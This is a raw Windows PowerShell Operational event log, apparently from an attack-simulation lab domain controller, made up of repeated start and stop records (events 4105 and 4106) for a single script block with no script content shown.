Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474511
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474510
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474509
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474508
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474507
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474506
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474505
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474504
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474503
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474502
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474501
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474500
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474499
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474498
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474497
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474496
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474495
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474494
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474492
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474491
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474490
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474489
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474488
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474487
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474486
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474485
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474484
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474483
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474482
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474480
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474478
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474477
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474476
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474475
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474474
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474473
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474472
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474471
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474470
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474469
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474468
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474466
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474465
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474464
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474463
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474462
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474461
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474460
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474459
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474458
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
